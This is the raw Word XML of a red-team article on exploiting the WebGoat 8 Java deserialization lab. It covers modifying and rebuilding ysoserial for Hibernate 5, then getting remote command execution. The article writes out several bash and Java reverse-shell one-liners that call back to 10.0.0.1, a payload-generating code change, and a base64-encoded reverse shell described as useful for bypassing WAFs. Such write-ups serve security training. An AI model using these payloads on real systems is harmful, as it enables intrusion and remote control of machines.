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ava Deserialization — From Discovery to Reverse Shell on Limited Environments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By </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://mobile.twitter.com/_ahmadsherif" \t "https://medium.com/abn-amro-red-team/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>Ahmed Sherif</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.linkedin.com/in/phraa/" \t "https://medium.com/abn-amro-red-team/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>Francesco Soncina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In this article, we are going to show you our journey of exploiting the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>Insecure Deserialization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerability and we will take </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>WebGoat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 deserialization challenge (deployed on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) as an example. The challenge can be solved by just executing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r>
        <w:t>for 5 seconds. However, we are going to move further for fun and try to get a reverse shell.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1"/>
        </w:rPr>
        <w:t>Introduction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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deserialization issue has been known in the security community for a few years. In 2015, two security researchers </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://twitter.com/frohoff" \t "https://medium.com/abn-amro-red-team/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>Chris Frohoff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HYPERLINK "https://twitter.com/gebl" \t "https://medium.com/abn-amro-red-team/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>Gabriel Lawrence</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gave a talk </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://frohoff.github.io/appseccali-marshalling-pickles/" \t "https://medium.com/abn-amro-red-team/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>Marshalling Pickles</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in AppSecCali. Additionally, they released their payload generator tool called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t>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Object serialization mainly allows developers to convert in-memory objects to binary and textual data formats for storage or transfer. However, deserializing objects from untrusted data can cause an attacker to achieve remote code execution.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1"/>
        </w:rPr>
        <w:t>Discovery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As mentioned in the challenge, the vulnerable page takes a serialized Java object in Base64 format from the user input and it blindly deserializes it. We will exploit this vulnerability by providing a serialized object that triggers a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>Property Oriented Programming Chain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (POP Chain) to achieve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>Remote Command Execution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> during the deserialization.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2409825"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1333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The WebGoat 8 Insecure Deserialization challenge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By firing up </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and installing a plugin called </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/federicodotta/Java-Deserialization-Scanner" \t "https://medium.com/abn-amro-red-team/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>Java-Deserialization-Scanner</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. The plugin is consisting of 2 features: one of them is for scanning and the other one is for generating the exploit based on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> the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t xml:space="preserve"> tool.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3124200"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0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Java Deserialization Scanner Plugin for Burp Suite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After scanning the remote endpoint the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plugin will report:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Hibernate 5 (Sleep): Potentially VULNERABLE!!!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Sounds great!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1"/>
        </w:rPr>
        <w:t>Exploitation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Let’s move to the next step and go to the exploitation tab to achieve arbitrary command execution.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3124200"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0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Huh?! It seems an issue with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t>. Let’s dig deeper into the issue and move to the console to see what is the issue exactly.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4029075"/>
            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
            <wp:docPr id="7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Error in payload generation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By looking at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t>, we see that two different POP chains are available for Hibernate. By using those payloads we figure out that none of them is being executed on the target system.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4591050"/>
            <wp:effectExtent l="0" t="0" r="7620" b="11430"/>
            <wp:docPr id="10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Available payloads in ysoserial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How the plugin generated this payload to trigger the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command then?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We decided to look at the source code of the plugin on the following link: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"https://github.com/federicodotta/Java-Deserialization-Scanner/blob/master/src/burp/BurpExtender.java" \t "https://medium.com/abn-amro-red-team/_blank"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0"/>
        </w:rPr>
        <w:t>federicodotta/Java-Deserialization-Scanner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>All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities …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0"/>
        </w:rPr>
        <w:t>github.com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We noticed that the payload is hard-coded in the plugin’s source code, so we need to find a way to generate the same payload in order to get it working.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4143375"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1905"/>
            <wp:docPr id="6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The payload is hard-coded.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Based on some research and help, we figured out that we need to modify the current version of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t xml:space="preserve"> in order to get our payloads working.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We downloaded the source code of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rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and decided to recompile it using Hibernate 5. In order to successfully build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t xml:space="preserve"> with Hibernate 5 we need to add the </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://mvnrepository.com/artifact/javax.el/javax.el-api/3.0.0" \t "https://medium.com/abn-amro-red-team/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>javax.el</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>pom.xml file.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We also have sent out a </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/frohoff/ysoserial/pull/98" \t "https://medium.com/abn-amro-red-team/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>Pull Request</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the original project in order to fix the build when the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>hibernate5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> profile is selected.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3162300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="11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Updated pom.xml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We can proceed to rebuild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rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>mvn clean package -DskipTests -Dhibernate5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and then we can generate the payload with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>java -Dhibernate5 -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 "touch /tmp/test" | base64 -w0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3752850"/>
            <wp:effectExtent l="0" t="0" r="7620" b="11430"/>
            <wp:docPr id="5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Working payload for Hibernate 5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We can verify that our command was executed by accessing the docker container with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>docker exec -it &lt;CONTAINER_ID&gt; /bin/bash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As we can see our payload was successfully executed on the machine!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3752850"/>
            <wp:effectExtent l="0" t="0" r="7620" b="11430"/>
            <wp:docPr id="8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The exploit works!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We proceed to enumerate the binaries on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>webgoat@1d142ccc69ec:/$ which php</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>webgoat@1d142ccc69ec:/$ which python</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>webgoat@1d142ccc69ec:/$ which python3</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>webgoat@1d142ccc69ec:/$ which wget</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>webgoat@1d142ccc69ec:/$ which curl</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>webgoat@1d142ccc69ec:/$ which nc</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>webgoat@1d142ccc69ec:/$ which perl</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>/usr/bin/perl</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>webgoat@1d142ccc69ec:/$ which bash</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>webgoat@1d142ccc69ec:/$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Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve">Perl </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash </w:t>
      </w:r>
      <w:r>
        <w:t>are available. Let’s try to craft a payload to send us a reverse shell.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We looked at some one-liners reverse shells on Pentest Monkeys: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"http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" \t "https://medium.com/abn-amro-red-team/_blank"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0"/>
        </w:rPr>
        <w:t>Reverse Shell Cheat Sheet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>If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards…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0"/>
        </w:rPr>
        <w:t>pentestmonkey.net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And decided to try the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1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However, as you might know, that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>java.lang.Runtime.exec()</w:t>
      </w:r>
      <w:r>
        <w:t>has some limitations. The shell operators such as redirection or piping are not supported.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We decided to move forward with another option, which is a reverse shell written in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. We are going to modify the source code on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve">Gadgets.java to </w:t>
      </w:r>
      <w:r>
        <w:t>generate a reverse shell payload.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The following path is the one which we need to modify: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9"/>
        </w:rPr>
        <w:t>/root/ysoserial/src/main/java/ysoserial/payloads/util/Gadgets.java from line 116 to 118.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following </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reverse shell is mentioned on Pentest Monkeys which still didn’t work:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>r = Runtime.getRuntime()</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>p = r.exec(["/bin/bash","-c","exec 5&lt;&gt;/dev/tcp/10.0.0.1/2002;cat &lt;&amp;5 | while read line; do \$line 2&gt;&amp;5 &gt;&amp;5; done"] as String[])</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>p.waitFor()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After some play around with the code we ended up with the following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>String cmd = "java.lang.Runtime.getRuntime().exec(new String []{\"/bin/bash\",\"-c\",\"exec 5&lt;&gt;/dev/tcp/10.0.0.1/8080;cat &lt;&amp;5 | while read line; do \\$line 2&gt;&amp;5 &gt;&amp;5; done\"}).waitFor();";clazz.makeClassInitializer().insertAfter(cmd);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Let’s rebuild </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/frohoff/ysoserial" \t "https://medium.com/abn-amro-red-team/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>ysoserial</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>again and test the generated payload.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4781550"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="9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Generating the weaponized payload with a Bash reverse shell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And.. we got a reverse shell back!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3076575"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="1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Great!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3900" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="12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Generalizing the payload generation process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During our research we found out this encoder as well that does the job for us ‘</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://jackson.thuraisamy.me/runtime-exec-payloads.html" \t "https://medium.com/abn-amro-red-team/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>http://jackson.thuraisamy.me/runtime-exec-payloads.html</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>’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By providing the following </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reverse shell: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9"/>
        </w:rPr>
        <w:t>bash -i &gt;&amp; /dev/tcp/[IP address]/[port] 0&gt;&amp;1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the generated payload will be:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xLzgwODAgMD4mMQ==}|{base64,-d}|{bash,-i}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Awesome! This encoder can also be useful for bypassing WAFs! </w:t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44953"/>
    <w:rsid w:val="7654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rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="8">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="9">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="7"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"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Strong"/>
    <w:basedOn w:val="7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2023-03-28T02:56:00Z</dcterms:created>
  <dc:creator>PANNA LAL GUPTA</dc:creator>
  <cp:lastModifiedBy>WPS_1665655857</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-28T02:57:29Z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